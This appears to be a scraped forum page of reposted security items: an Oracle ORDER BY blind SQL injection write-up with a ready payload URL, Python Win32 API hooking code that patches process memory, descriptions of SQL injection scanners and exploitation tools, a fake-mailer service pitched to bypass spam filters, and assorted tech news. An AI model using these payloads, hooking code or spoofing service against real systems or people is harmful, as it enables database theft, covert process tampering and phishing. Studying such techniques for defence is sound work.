Nytro

Exploiting SQL Injection in ORDER BY on Oracle/MySQL submitted by alla on 10 May, 2011 - 15:10 Consider the following piece of code: $sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name"; The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection. The way to exploit such SQL injection on MySQL backend is described by Sumit Siddharth here and by Jacco van Tuijl here I couldn't find any clues for Oracle though, so now that I have figured it out, here is how. This is a blind SQL injection technique - we'll have to extract one bit of info per query, using the order in which the data is returned by the application. Let's assume that the vulnerable script is called as vulnerable.php?sortcolumn=id . In this case it returns the following data: foo bar baz We can try sorting by other columns and see if the data gets returned in different order. Say, if we try vulnerable.php?sortcolumn=something, we get back: bar baz foo Now all we need to do is to get the query to sort the data by different column depending on the value of a given expression. In Oracle the following syntax works: ORDER BY (case when ((boolean_expression)) then id else something end) If boolean_expression is true the result will be sorted by id, otherwise by something. So, the vulnerable script may be called like this: vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end) This will extract the most significant bit of the first character of the first row returned by "select table_name from all_tables" query. Actually fetching significant amounts of data obviously requires automation. MySQL: http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/ http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/ Sursa: http://www.gremwell.com/exploiting_sql_injection_in_order_by_on_oracle

Microsoft confirms purchase of Skype for $8.5 billion Tom Warren 2 hours ago Microsoft announced on Tuesday the acquisition of Skype. The software giant announced the deal on Tuesday, valued at $8.5 billion cash. Both Skype and Microsoft’s board of directors have approved the deal and Microsoft will create a new business division especially for Skype. Skype CEO Tony Bates will assume the title of president of the Microsoft Skype Division, reporting directly to Ballmer. “Skype is a phenomenal service that is loved by millions of people around the world,” said Microsoft CEO Steve Ballmer. “Together we will create the future of real-time communications so people can easily stay connected to family, friends, clients and colleagues anywhere in the world.” Microsoft says Skype will support Microsoft devices like Xbox and Kinect, Windows Phone and a wide array of Windows devices, and Microsoft will connect Skype users with Lync, Outlook, Xbox Live and other communities. Microsoft will continue to invest in and support Skype clients on non-Microsoft platforms. “Tony Bates has a great track record as a leader and will strengthen the Microsoft management team. I’m looking forward to Skype’s talented global workforce bringing its insights, ideas and experience to Microsoft,” Ballmer said. Skype currently has 170 million connected users and saw over 207 billion minutes of voice and video conversations in 2010 alone. Microsoft’s promise for Windows Phone, Xbox and Kinect Skype integration confirms that the company will look to use Skype broadly across its products. Skype was originally founded in 2003 and acquired by eBay in September 2005. An investment group led by Silver Lake acquired Skype in 2009. Speaking on behalf of the investor group that sold Skype to Microsoft, Egon Durban, managing director of Silver Lake, said: “We are thrilled with Skype’s transformation during the period of our ownership and grateful for the extraordinary commitment of its management team and employees. We are excited about Skype’s long-term future with Microsoft, as it is poised to become one of the world’s most dynamic and comprehensive communications platforms.” Sursa: Microsoft confirms purchase of Skype for $8.5 billion | WinRumors

API Hooking in Python Author: cadaver (cred) # patcher.py # handles patching and unpatching of process memory. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack, calcsize from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def OpenProcess (pid=GetCurrentProcessId()): """Opens a process by pid.""" DB ("[openProcess] pid:%s."%pid) phandle = windll.kernel32.OpenProcess (\ PROCESS_ALL_ACCESS, False, pid ) assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1] return phandle def readMemory (phandle, address, size): """readMemory (address, size, phandle):""" cbuffer = c_buffer (size) success = windll.kernel32.ReadProcessMemory (\ phandle, address, cbuffer, size, 0 ) assert success, "Failed to read memory!\n%s" % WinError (GetLastError()) [1] return cbuffer.raw def writeMemory (phandle, address=None, data=None): """Writes data to memory and returns the address.""" assert data size = len (data) if isinstance (data, str) else sizeof (data) cdata = c_buffer (data) if isinstance (data, str) else byref (data) if not address: address = allocate (size, phandle) success = windll.kernel32.WriteProcessMemory (\ phandle, address, cdata, size, 0 ) assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1] DB ("[write memory] :%s OK." % address) return address def allocate (size, phandle): """Allocates memory of size in phandle.""" address = windll.kernel32.VirtualAllocEx (\ phandle, 0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) assert address, "Failed to allocate memory!\n%s" % WinError(GetLastError()) [1] DB ("[memory allocation] :%s" % address) return address def releaseMemory (address, size, phandle): """Releases memory by address.""" return windll.kernel32.VirtualFreeEx (\ phandle, address, size, MEM_RELEASE ) assert success, "Failed to read process memory!\n%s" % WinError(GetLastError()) [1] return cbuffer.raw def transport (data, phandle): size = len (data) memory = allocate (size, phandle) writeMemory (phandle, memory, data) return memory def get_patch (destination, params_size=0): """mov eax, destination call eax retn params_size """ if isinstance (destination, (int,long)): destination = pack ("i", destination) if isinstance (params_size, (int,long)): params_size = pack ("h", params_size) return '\xb8%s\xff\xd0\xc2%s' % (destination, params_size) def get_cparams_size (cparams): if not cparams: return 0 s = '' for param in cparams: s += "size += sizeof (%s);\n" % param c_code = """ int getsize () { int size = 0; %s return size; }""" % s #DB (c_code) ccompiler = pytcc () ccompiler.compile (c_code) ccompiler.relocate () getsize = ccompiler.get_function ("getsize") size = getsize () # ccompiler.delete () return size def get_cparams_size_b (cparams): return sum (map (calcsize, [param._type_ for param in cparams])) def find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): """find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): Searches the instructions inside an API for a good place to patch.""" # DEBUG if DEBUG == 2: bytes = PyGetString (apiaddress, needed_size * 2) dprint (apiaddress, bytes) # # # # aoffset = 0 found_space = 0 position = apiaddress while found_space < needed_size: bytes = PyGetString (position, 24) # DB ("found_space: %s. aoffset: %s. apiaddress: %s." % (found_space, aoffset, hex(position))) # if does_code_end_function (bytes): raise "Function end found before enough space was found!" offset, size, instruction, hexstr = Decode (position, bytes) [0] if "ret" in instruction.lower (): raise "Function end found before enough space was found!" if not filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): found_space += size else: found_space = 0 aoffset += size if aoffset >= maxscan: raise "Maxscan exceeded while searching for a good spot to patch!" position += size return apiaddress + (aoffset - found_space) class patcher: source = None destination = None jmp_asm = None original_bytes = None params_size = 0 pid = None phandle = None duplicate_api = None original_api = None def __init__ (self, source=None, destination=None, params_size=0, pid=GetCurrentProcessId () ): self.set_pid (pid) self.set_source (source) self.set_destination (destination) self.set_params_size (params_size) def set_pid (self, pid): self.close () self.phandle = OpenProcess (pid) self.pid = pid def set_source (self, source): self.source = source def set_destination (self, destination): self.destination = destination def set_params_size (self, size): self.params_size = size def set_source_as_api (self, apiname, dllname="kernel32.dll", free=True): module = LoadLibrary (dllname) procedure = GetProcAddress (module, apiname) if free: FreeLibrary (module) assert procedure self.original_api = eval ("windll.%s.%s" % (dllname.strip(".dll"), apiname)) self.source = find_good_spot_to_patch (procedure, len (get_patch (0, self.params_size))) if DEBUG: DB ("found good spot to patch: %s %s. Offset from original api address: %s." \ %(self.source, hex (self.source), self.source - procedure)) def patch (self): assert all ((self.phandle, self.source, self.destination)), "Patch source or destination not set!" assert not self.original_bytes, "Already patched!" self.jmp_asm = get_patch (self.destination, self.params_size) jmp_asm_size = len (self.jmp_asm) self.original_bytes = PyGetString (self.source, jmp_asm_size) assert self.original_bytes, "Failed to capture original_bytes." writeMemory (\ phandle=self.phandle, address=self.source, data=self.jmp_asm) msg = "[jmp_asm]:%s\n[jmp_asm_size]:%s\n[original_bytes]:%s\n" \ % (repr (self.jmp_asm), jmp_asm_size, repr (self.original_bytes)) DB (msg) def unpatch (self): if not self.original_bytes: raise "Not patched!" assert all ((self.phandle, self.source, self.destination)), "Not initialized!" writeMemory (\ phandle=self.phandle, address=self.source, data=self.original_bytes ) self.original_bytes = None def close (self): if self.phandle: windll.kernel32.CloseHandle (self.phandle) self.phandle = None def release (self): if self.phandle and self.duplicate_api: releaseMemory (self.duplicate_api, 0, self.phandle) def call_original_api (self, *args, **kwargs): return self.original_api (*args, **kwargs) def call_duplicate_api (self, types, *args, **kwargs): return WINFUNCTYPE (c_void_p, types) (self.duplicate_api) (*args, **kwargs) def __del__ (self): try:self.unpatch () except:pass try:self.release () except:pass try:self.close () except:pass def dprint (a, c): """Pretty prints disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size print #cad # tramper.py # Relocates bytes of an API and creates a jump from those bytes to the original API affectively negating a hook. # TODO !Recalculate Relocated Relative jmp and call addresses. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode from patcher import OpenProcess, readMemory, writeMemory, allocate, transport DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): """tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): Creates a duplicate API using the trampoline method and returns its address. """ if DEBUG: global hprocess, landing_offset, instructions, landing_address, tramp_memory, tramp_code, original_bytes if not apiaddress: dll = LoadLibrary (dllname) apiaddress = GetProcAddress (dll, apiname) landing_offset = 0 hprocess = OpenProcess () original_bytes = PyGetString (apiaddress, 300) tramp_memory = allocate (len (original_bytes) + 50, hprocess) print "Tramp memory: %s %s." % (tramp_memory, hex (tramp_memory)) instructions = Decode (apiaddress, original_bytes) sizes = iter ([X[1] for X in instructions]) while landing_offset < hook_size: landing_offset += sizes.next () landing_address = apiaddress + landing_offset DB ("Landing offset : %s %s" % (landing_offset, hex (landing_offset))) DB ("Landing address: %s %s" % (landing_address, hex (landing_address))) distance = landing_address - (tramp_memory +landing_offset) DB ("Distance: %s %s." % (distance, hex (distance))) tramp_code = original_bytes [:landing_offset] # api start - past hook - to start of instruction instructions = Decode (apiaddress, tramp_code) boffset = 0 for offset, size, instruction, hexstr in instructions: if filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): raise "[not supported yet] Cannot relocate CALL/JMP Instructions. Address: %s"% (apiaddress + boffset) boffset += size # # TODO !Recalculate Relocated Relative jmp and call addresses. # jump_code = '\xe9' + pack ("i", distance - 5) # bytes = jmp (distance - size of jump) tramp_code += jump_code # DEBUG DB ("Tramp [size]: %s [bytes]; %s" % (len(tramp_code), (repr(tramp_code)))) DB ("Tramper api decode.") if DEBUG: dprint (apiaddress, tramp_code) # # # # writeMemory (hprocess, tramp_memory, tramp_code) CloseHandle (hprocess) return tramp_memory def dprint (a, c): """ pretty print disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size if __name__ == "__main__": # Test. lib = LoadLibrary ("kernel32") OpenProcessAddr = GetProcAddress (lib, "OpenProcess") FreeLibrary (lib) trampAddr = tramper (\ apiaddress=OpenProcessAddr, # (optional if apiname is defined) API address to duplicate. hook_size=10, # size of our API jmp code. (minimum size of relocated API bytes) apiname=None, # (optional) dllname="kernel32") # (optional / defaults to kernel32) # Prototype the OpenProcess trampoline. duplicate_OpenProcess = WINFUNCTYPE (c_int, c_int, c_int, c_int) (trampAddr) pid = GetCurrentProcessId () print "Calling duplicate OpenProcess with pid: %s" % pid phandle = duplicate_OpenProcess (0x1f0fff, 0, pid) print "Return value: %s." %phandle if phandle: CloseHandle (phandle) #cad # hooker.py # deals with hooking of win32 APIs. # public domain code. from patcher import * from tramper import tramper from win32api import * from pytcc import pytcc def create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ create_hook (pat, duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ c_code =\ """ %s function (int caller, %s) { %s %s RET = DUPE ( %s ); %s return RET; }""" cargs = '' symbols = '' for arg, char in zip (cparam_types, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"): symbols += "%s, " % char cargs += "%s %s, " % (arg, char) symbols = symbols [:-2] cargs = cargs [:-2] c_code = c_code % (restype, cargs, prelogic, restype, symbols, postlogic) ccompiler = pytcc () ccompiler.add_lib_proc ("msvcrt.dll", "memset") ccompiler.add_symbol ("DUPE", duplicate_api) ccompiler.compile (c_code) ccompiler.relocate () hook = ccompiler.get_symbol ("function") return (c_code, hook) def hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """ pat = patcher () params_size = get_cparams_size (cparam_types) pat.set_params_size (params_size) pat.set_source_as_api (apiname, dllname) hook_size = len (get_patch (pat.destination, pat.params_size)) tramp = tramper (pat.source, hook_size) pat.duplicate_api = tramp hook_ccode, hooks = create_hook (tramp, cparam_types, prelogic, postlogic, restype) pat.c_code = hook_ccode pat.set_destination (hooks) return pat if __name__ == '__main__': # Test. hook = hooker (\ # API to hook apiname="OpenProcess", # the DLL the API is in. (defaults to kernel32) dllname="kernel32", # (required) API parameter types. In our hook these get translated to the names A,B,C...respectively. cparam_types=["int", "int", "int"], # (required) the API return type. restype="int", # (optional) this is the code in our hook wich is executed Before the real API. prelogic="if (C==1) {return 1111;}", # (optional) this is the code in our hook wich is executed After the real API. The real API's return value is named RET. postlogic="if (RET) {return 0;}" ) # hook API. # hook automatically unhooks itself and cleans up when it isnt refered to anymore. hook.patch () print "Calling hooked OpenProcess api with process id as 1." ret = windll.kernel32.OpenProcess (0x1f0fff, 0, 1) print "Return value: %s" % ret if ret == 1111: print "This test was sucesful." else: print "Return value is unexpected." # unhook API. # hook.unpatch () #cad Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3110 Sursa: API Hooking in Python - rohitab.com - Forums

Nu, continea SQLite, deci 99% era un Stealer, care printre altele era si pentru Firefox. Nu m-am chinuit sa analizez fisierul, am vazut aia, am dat ban.

Address Space Randomization for Mobile Devices Hristo Bojinov Stanford University Dan Boneh Stanford University Rich Cannings Google, Inc. Iliyan Malchev Google, Inc. ABSTRACT Address Space Layout Randomization (ASLR) is a defen- sive technique supported by many desktop and server oper- ating systems. While smartphone vendors wish to make it available on their platforms, there are technical challenges in implementing ASLR on these devices. Pre-linking, lim- ited processing power and restrictive update processes make it difficult to use existing ASLR implementation strategies even on the latest generation of smartphones. In this paper we introduce retouching, a mechanism for executable ASLR that requires no kernel modications and is suitable for mo- bile devices. We have implemented ASLR for the Android operating system and evaluated its eectiveness and per- formance. In addition, we introduce crash stack analysis, a technique that uses crash reports locally on the device, or in aggregate in the cloud to reliably detect attempts to brute-force ASLR protection. We expect that retouching and crash stack analysis will become standard techniques in mobile ASLR implementations. Download: http://bojinov.org/professional/wisec2011-mobileaslr-paper.pdf

UNIX Tutorial for Beginners These tutorials are derived from the excellent tutorials from the University of Surrey, UK, with some minor modifications for our site. The originals can be found here. Typographical Conventions Introduction to The UNIX operating system Tutorial One Listing files and directories Making Directories Changing to a different Directory The directories . and .. Pathnames More about home directories and pathnames Tutorial Two Copying Files Moving Files Removing Files and directories Displaying the contents of a file on the screen Searching the contents of a file Tutorial Three Redirection Redirecting the Output Redirecting the Input Pipes Tutorial Four Wildcards Filename Conventions Getting Help Tutorial Five File system security (access rights) Changing access rights Processes and Jobs Listing suspended and background processes Killing a process Tutorial Six Other Useful UNIX commands Tutorial Seven Compiling UNIX software packages Download source code Extracting source code Configuring and creating the Makefile Building the package Running the software Stripping unnecessary code Tutorial Eight UNIX variables Environment variables Shell variables Using and setting variables UNIX Frequently Asked Questions (FAQs) These seven articles contain the answers to some Frequently Asked Questions often seen in comp.unix.questions and comp.unix.shell. History of UNIX UNIX was originally developed at Bell Laboratories as a private research project by a small group of people. Read all about the history of its creation. This tutorial is licensed under a Creative Commons License. The original version was prepared and is copyrighted by Michael Stonebank of the University of Surrey, UK. Online: http://manuals.itc.virginia.edu/unixtut/index.html

SQID SQL Injection Digger About SQL injection digger is a command line program that looks for SQL injections and common errors in web sites. Current version can perform the following operations: Look for SQL injections and common errors in web site URLs found by performing a google search. Look for SQL injections and common errors in a given URL or a file with URLs. Look for SQL injections and common errors in links from a web page. Crawl a web site/web page and do the above. Also supports Load multiple triggers from file. Load multiple signature databases from files. HTTPS support. HTTP proxy support with authentication. Basic authentication. Specify user agent. Specify referer. HTTP Cookies loading from command line or a file. sqid is written in ruby.Find out more about SQL Injection. sqid is extensible by adding more signatures to its database (sqid.db). The signatures simply use regular expressions. Usage Usage: sqid.rb [options] options: -m, --mode MODE Operate in mode MODE. MODE is one of g,google Operate in google search mode. u,url Check this url or a file with urls. p,page Check single page. c,crawl Crawl website and check. Google search mode options: -q, --query QUERY QUERY to perforn google search for. -s, --start START zero-based index of the first desired result, zero if not specified. -r, --results RESULTS number of results desired, default is 20 if not specfied. rounded to tens. URL check mode options: -u, --url URL check this URL. If URL is a file urls will be loaded from this file, specify each url on a new line. Page check mode options: -p, --page PAGE Check this page. Crawl mode options: -c, --crawl WEBSITE Crawl website WEBSITE and check. specfify as http[s]://WESITE:[PORT], default PORT is 80 URL, Page and Crawl mode common options: -C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value. If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line. -a, --accept-cookies Accept cookies from the webite or page. Default is no. -R, --referer REFERER Set referer in the HTTP header. -B, --auth CREDENTIALS Use crendtials as basic auth for the website. specfify as user:password. Common options: -o, --with-noquery Match page content without query parameters. Default is false. -D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database. -t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '. If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline. Lines starting with a # are ignored. -T, --time-out TIMEOUT Timeout for response in seconds. Default is 10 seconds. -U, --user-agent USERAGENT User Agent in the HTTP Header. -P, --proxy PROXY User HTTP proxy PROXY for operations. specfify as proxy:port. -A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy. specfify as user:password. -v, --verbose Run verbosely. -h, --help Show this message Download: http://rubyforge.org/frs/?group_id=2617

SQL Power injector Introduction SQL Power Injector is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page. For now it is SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing DBMS when using the inline injection (Normal mode). Indeed, the normal mode is basically the SQL command that someone will put in the parameter sent to the server. If the aspect of inline SQL injection is powerful in itself, its main strength dwells in the multithreaded automation of the injection. Not only there is a possibility to automate tedious and time consuming queries but you can also modify the query to get only what you want. It is obviously more useful in the blind SQL injection since the other ways to exploit the SQL injection vulnerability is more effusive and much faster when the results are displayed on the web page (union select in a HTML table and generated 500 error for instance). The automation can be realized in two ways: comparing the expected result or by time delay. The first way is generally compared against an error or difference between positive condition with a negative one and the second way will turn out positive if the time delay sent to the server equals to the one parameterized in the application. The main effort done on this application was to make it as painless as possible to find and exploit a SQL injection vulnerability without using any browser. That is why you will notice that there is an integrated browser that will display the results of the injection parameterized in a way that any related standards SQL error will be displayed without the rest of the page. Of course, like many other features of this application, there are ways to parameterize the response of the server to make it as talkative to you as possible. Another important part of this application is its power to get all the parameters from the web page you need to test the SQL injection, either by GET or POST method. Like this someone won't need to use several applications or a proxy to intercept the data, all is automated! Not only that, but now there is a Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies). I worked hard on the application usability but I am aware that at first use it's not too obvious. I'm pretty confident that once the few things you need to comprehend are understood it will be quite easy to use afterwards. In order to help a beginner to understand its basic features I created a tutorial that not only will help him out but can also be educative for some advanced SQL injection techniques. Moreover, You will find some great tricks in the FAQ as well and now with the version 1.2 a help file (chm) containing a list of the most useful information for SQL injection. Also, I designed this application the way I was making my own pen testing and how I was using SQL injection. It has been tested successfully many times on real life web sites (legally of course) and as soon as I see something missing I'm adding it. Now of course that it's officially available to the security community I will have to have more rigors and wait to add them in a new version of the software. This process has already started and many more features will come with time. Finally, this application will be free of charge and hopefully be used to help in security assessments made by security professionals or to further the knowledge of the techniques used. Obviously I will not be held responsible of any misuses or damage caused by this application. What It's Not This application if powerful won't find SQL injection vulnerabilities for you nor will find the right syntax if one found. Its main strength is to provide a way to find them more easily and once they are found to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique. Moreover, I didn't intent to make it to be a database pumping application. There are plenty good applications for that purpose. In any cases many pumped data are not relevant and since it takes time to pump it can be a real waste of time. It's better to refine and get what you really want. Lastly, if I added the feature (mini-browser) to have the results in an HTML format it doesn't mean that it has all the features of a professional browser. Internet Explorer and Mozilla, to mention a few, are real complex software that it would be nearly impossible to implement all their features in my application. That's why that you won't be able to use it as a conventional browser even though it has the same look and feel. Features Supported on Windows, Unix and Linux operating systems SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant SSL support Load automatically the parameters from a form or a IFrame on a web page (GET or POST) Detect and browse the framesets Option that auto detects the language of the web site Detect and add cookies used during the Load Page process (Set-Cookie detection) Find automatically the submit page(s) with its method (GET or POST) displayed in a different color Can create/modify/delete loaded string and cookies parameters directly in the Datagrids Single SQL injection Blind SQL injection Comparison of true and false response of the page or results in the cookie Time delay Response of the SQL injection in a customized browser Can view the HTML code source of the returned page in HTML contextual colors and search in it Fine tuning parameters and cookies injection Can parameterize the size of the length and count of the expected result to optimize the time taken by the application to execute the SQL injection Create/edit ASCII characters preset in order to optimize the blind SQL injection number of requests/speed Multithreading (configurable up to 50) Option to replace space by empty comments /**/ against IDS or filter detection Automatically encode special characters before sending them Automatically detect predefined SQL errors in the response page Automatically detect a predefined word or sentence in the response page Real time result Save and load sessions in a XML file Feature that automatically finds the differences between the response page of a positive answer with a negative one Can create a range list that will replace the variable (<<@>>) inside a blind SQL injection string and automatically play them for you Automatic replaying a variable range with a predefined list from a text file Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies) Two integrated tools: Hex and Char encoder and MS SQL @options interpreter Can edit the Referer Can choose a User-Agent (or even create one in the User-Agent XML file) Can configure the application with the settings window Support configurable proxies Differences with Other Tools To be honest, I didn't study all the other tools features in all their details. The only thing I can say is that if they are great they always lack something important that I need when I'm doing SQL injection. Some application will find the SQL injection for you that sometimes will result in false positive. And others will generically pump the data of the database. Some of those applications got smarter and you can check for what you need when the list of databases has been pumped. Or ask a specific hard coded data, such as the current DB user. But none of them have the ability to specifically choose what you want as far as I know. That ability comes with a cost of course, you need to know some SQL syntax, but I can assure that once someone understands how it works, not much syntax is required. Also, I cannot recall to have seen any application using the time delay feature inserted in the application. Many SQL injection vulnerabilities are impossible to exploit unless you use that technique. A technique that could be really tedious and time consuming, that often results by giving up after long hours of copy pasting the command in the browser when done manually. I don't remember as well to have seen any multithread feature that can be most definitely a really important time saver. Nor the ASCII characters preset feature that can save up to 25% the blind SQL injection. (Please look at the statistics section for some figures) I apologize in advance to those who have made their own application and made it available on the Net that possess those features before I made SQL Power Injector available. Please let me know and I will update this section. Summary of the differences: Web page string and cookie parameters auto detection Fine tuning parameters SQL injection Time delay feature Multithread feature Response results in a customized browser Automated positive and negative condition discovery Blind SQL injection characters preset optimizer Screenshots You will find two screen shots demonstrating the two techniques used in the application: Normal and Blind. Screen 1: SQL Power injector with Normal technique Screen 2: SQL Power injector with Blind technique Some Statistic Figures I didn't use any scientific methods so do not consider those statistics as scientific facts but more as a general idea of what you can expect. Especially that no one controls the flux on the Net and I would be really hard pressed to give any valuable scientific data. Another thing, I didn't make enough tests (10 times for each thread) to have a real statistical sample since the goal of these numbers will be to show approximately what you can expect. Moreover, it will depend also of the size of the data sought. Sometimes a lower number of threads will be more effective than more. In fact, the time taken will be optimized if the length of the value is a divisible number of the number of thread. So let's say we have 24 characters length, 3, 4, 6 and 8 will be faster than any other. As a rule of thumb, the bigger gap of time between any thread is from 1 to 2. As you can see the higher is not always the better. You will see some examples in the following statistics. Even though you can go up to 50 threads, I have discovered that around 10 threads it's starting to have errors and getting slower and slower. So again bigger number of threads is not necessary better. I must warn as well that the higher number of threads is, the higher is the chances to crash the web application (web server or database) I must thank Nathaniel Felsen to have allowed me to test on one of his web server and my wife Elizabeth to have done all the tedious tests for me in her free time. Here are the characteristics of the computer used to make the tests: AMD Athlon ? 64 X2 Dual Core Processor 4200+ GHz 2 GB of RAM Windows XP SP 2 ADSL 1 MB/s Ping round trip average time of 173 ms Download: http://www.sqlpowerinjector.com/download.htm

Nu, cam Google incepuse monopolizarea, Microsoft a cam ramas in urma...

Cui ii pasa de unde au ideea, problema noastra e sa gasim metode sa scoatem bani multi, usor si desigur legal din asta

SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering SWFRETools package contains three different tools. The most advanced tool is called Flash Dissector. It is a Java-based GUI tool you can use to inspect the binary content of SWF files. The second tool is a Java-based command-line tool called Minimizer. This tool is useful for vulnerability researchers that have a SWF file that crashes Flash Player and now they want to get rid of all parts of the SWF file that are not related to the crash. The third tool is a primitive Python-based debugger that can be used to hook and trace the Flash Player executable. Download: https://github.com/sporst/SWFREtools/downloads Sursa: SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering ! ~ THN : The Hackers News

Online Fake Mailer As IT managed services are now focuing on clouds, So is the information security. Spam mails are the biggest threat to every individual and it is not going to end any sooner. But now a days spam filter do their job quit efficiently making spammers life a bit worried. so here is a online we mean a “cloud service” which can test both spammers and spam filters skills. Small list if features Email Doesn’t go in spam folder Instant delivery of emails With Attachment Support With HTML Editor And Many Other Features http://emkei.cz/

Google Chrome Pwned by VUPEN aka Sandbox/ASLR/DEP Bypass Hi everyone, We are (un)happy to announce that we have officially Pwned Google Chrome and its sandbox. The exploit shown in this video is one of the most sophisticated codes we have seen and created so far as it bypasses all security features including ASLR/DEP/Sandbox, it is silent (no crash after executing the payload), it relies on undisclosed (0day) vulnerabilities discovered by VUPEN and it works on all Windows systems (32-bit and x64). The video shows the exploit in action with Google Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64). The user is tricked into visiting a specially crafted web page hosting the exploit which will execute various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level. Note: The Calculator is used here as an example, it can be replaced by any other payload. While Chrome has one of the most secure sandboxes and has always survived the Pwn2Own contest during the last three years, we have now uncovered a reliable way to execute arbitrary code on any installation of Chrome despite its sandbox, ASLR and DEP. This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services. Sursa si video demonstrativ: http://www.vupen.com/demos/

Skype în negocieri pentru un parteneriat cu Microsoft ? 09 mai 2011 | 11:29 Aurelian Mihai Skype, renumitul furnizor pentru servicii de telefonie prin internet a devenit subiect de bârf? în urma informa?iilor ap?rute în ultima s?pt?mân?, ce anun?? negocieri intense purtate între oficialii companiei ?i reprezentan?i ai Facebook ?i Google, aparent pentru stabilirea unui parteneriat sau chiar achizi?ia acesteia. Mai nou, chiar ?i Microsoft pare s? intre în jocul negocierilor, iar motiva?ii pentru un eventual parteneriat sau achizi?ia portofoliului Skype sunt destule: Achizi?ia sau parteneriatul cu Skype poate aduce compania într-o pozi?ie favorabil? pe pia?a de comunica?ii enterprise, unde Skype are deja o prezen?? solid? pe partea serviciilor de voce, video ?i sharing. Prin achizi?ia Skype, Microsoft ar ob?ine dreptul de a integra serviciile companiei cu versiunile viitoare ale platformei Windows Mobile, impulsionând astfel adoptarea acesteia de c?tre un public mai larg. Împreun? cu Skype, Microsoft ar avea posibilitatea de a colabora cu marii operatori ai re?elelor de telefonie mobil?, mul?i dintre ei interesa?i deja de un parteneriat cu Skype Informa?iile venite din surse apropiate de Skype promit un anun? oficial în decursul acestei s?pt?mâni. În timp ce o achizi?ie integral? este pu?in probabil?, este posibil s? asist?m la crearea unui parteneriat între Microsoft ?i Skype, similar celui stabilit deja cu Nokia, din care ambele companii s? aib? de câ?tigat. Sursa: Skype în negocieri pentru un parteneriat cu Microsoft ?

Facebook te pl?te?te s? urm?re?ti reclame! 09 mai 2011 | 10:21 Aurelian Mihai Facebook a introdus un nou program de promovare, prin care utilizatorii sunt motiva?i financiar s? priveasc? anumite reclame. Vizionarea reclamelor distribuite prin re?eaua Facebook este recompensat? folosind sistemul de credite, fiecare reclam? fiind recompensat? cu 1 credit sau echivalentul a 10 cen?i. Chiar daca nu se poate vorbi despre o recompens? substan?ial?, promisiunea unui câ?tig ar putea fi suficient? pentru acei utilizatori care petrec oricum foarte mult timp conecta?i la re?eaua Facebook ?i doresc sa valorifice cumva acel timp. Mesajele publicitare pl?tite vor ap?rea mai ales în jocuri, cum ar fi Crowd Star, Digital Chocolate ?i Zynga. Facebook colaboreaz? cu Sharethrough, SocialVibe, Epic Media ?i SupersonicAds pentru furnizarea de reclame în cadrul programului, precum ?i TrialPay, un sistem de sondaje ai c?rui participan?i sunt recompensa?i financiar. Dan Greenberg, CEO pentru Sharethrough, a afirmat c? ini?iativa luat? de Facebook reprezint? o departajare de la sistemul tradi?ional de reclame întreruptive, oferind mesaje publicitare cu caracter de divertisment, pe care utilizatorii vor dori s? le priveasc? ?i s? le trimit? mai departe prietenilor. De?i câ?tigurile realizate nu pot fi transferate pe card-ul de credit, sistemul de credite Facebook ne ofer? posibilitatea de a cheltui ace?ti bani pentru a cump?ra diverse bunuri promovate în cadrul reclamelor pe care le vizion?m, 